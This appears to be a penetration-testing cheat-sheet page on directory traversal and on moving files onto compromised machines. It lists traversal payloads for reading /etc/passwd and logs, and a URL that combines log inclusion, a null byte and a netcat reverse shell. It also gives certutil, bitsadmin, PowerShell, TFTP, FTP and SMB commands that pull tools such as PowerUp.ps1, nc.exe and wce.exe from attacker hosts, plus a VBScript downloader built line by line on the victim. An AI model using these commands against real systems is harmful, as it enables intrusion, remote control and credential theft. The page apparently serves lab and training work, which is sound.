File transfer

Directory traversal

What is it?

Directory Traversal, also known as Path Traversal, is a vulnerability that allows an attacker to read files on the victim’s system by manipulating file paths used in the application.

A simple example:

A vulnerable web application may have the endpoint /get_file?path={filepath} When a request is made, the application returns the content of the specified file. If an attacker inserts a path into {filepath} such as ../../../etc/passwd, they might get access to the system files. The application then fetches this file, and if the file contents are sent in the response, the attacker can view sensitive system information.

Remember that a payload or attack may change depending on the application and the server's file system. Directory Traversal can often lead to:

Sensitive data exposure
System information disclosure

Other learning resources:

PortSwigger: https://portswigger.net/web-security/file-path-traversal

Checklist

Exploitation

Basic directory traversal

../../../../etc/passwd

Reading application's own configuration files

../../webapp/config/database.ini

Log exposure

../../../../var/log/apache2/access.log

Non-recursive filter bypass

..././..././..././..././..././..././etc/passwd

Tools

Web Server

https://github.com/sc0tfree/updog

Install and run updog:

pip3 install updog
updog
updog -d /another/directory
updog -p 1234
updog --password examplePassword123!
updog --ssl

Simple Python HTTP server:

# Python 2
python -m SimpleHTTPServer 8080

FTP Server

Start a Twisted FTP server:

twistd -n ftp -p 21 --root /path/

From a victim to upload a file to your FTP server:

curl -T out.txt ftp://10.10.15.229

Example reverse-shell FTP script (create file then run):

# Create ftp script (on victim)
echo open 10.11.1.111 > ftp.txt)
echo USER anonymous >> ftp.txt
echo ftp >> ftp.txt
echo bin >> ftp.txt
echo GET file >> ftp.txt
echo bye >> ftp.txt

# Execute
ftp -v -n -s:ftp.txt

TFTP Server

On Kali:

atftpd --daemon --port 69 /tftp

From a reverse-Windows shell (download netcat and execute):

tftp -i 10.11.1.111 GET nc.exe
nc.exe -e cmd.exe 10.11.1.111 4444

Example vulnerable URL (shows using null byte to include logs and run nc.exe):

http://10.11.1.111/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=nc.exe%20-e%20cmd.exe%2010.11.0.105%204444

Windows — File Transfer Methods

Bitsadmin:

bitsadmin /transfer mydownloadjob /download /priority normal http:///xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe

Certutil:

certutil.exe -urlcache -split -f "http://10.11.1.111/Powerless.bat" Powerless.bat

Powershell:

(New-Object System.Net.WebClient).DownloadFile("http://10.11.1.111/CLSID.list","C:\Users\Public\CLSID.list")
invoke-webrequest -Uri http://10.10.14.19:9090/PowerUp.ps1 -OutFile powerup.ps1

FTP (from a reverse shell — see FTP Server section above for full FTP script)

SMB Server

Run an SMB share using Impacket's smbserver:

# Python 2 impacket example path (older distributions)
python /usr/share/doc/python-impacket/examples/smbserver.py Lab "/root/labs/public/10.11.1.111" -u usuario -p pass

# Python 3 impacket example path
python /usr/share/doc/python3-impacket/examples/smbserver.py Lab "/root/htb/169-resolute/smb"

Or configure Samba by editing /etc/samba/smb.conf (example configuration):

[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody

Set permissions and restart Samba:

chmod -R 777 smb_path
chown -R nobody:nobody smb_path
service smbd restart

From a victim machine with a reverse shell:

Download from SMB share:

copy \\10.11.1.111\Lab\wce.exe .

Upload to SMB share:

copy wtf.jpg \\10.11.1.111\Lab

VBScript downloader (create on the victim)

Create wget.vbs via echoed lines and execute:

# Create wget.vbs (on victim)
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

# Execute
cscript wget.vbs http://10.11.1.111/file.exe file.exe

PreviousShell NextUnix Exploit

Last updated 1 month ago

hashtagDirectory traversal

hashtagWhat is it?

hashtagChecklist

hashtagExploitation

hashtagTools

hashtagWeb Server

hashtagFTP Server

hashtagTFTP Server

hashtagWindows — File Transfer Methods

hashtagSMB Server

hashtagVBScript downloader (create on the victim)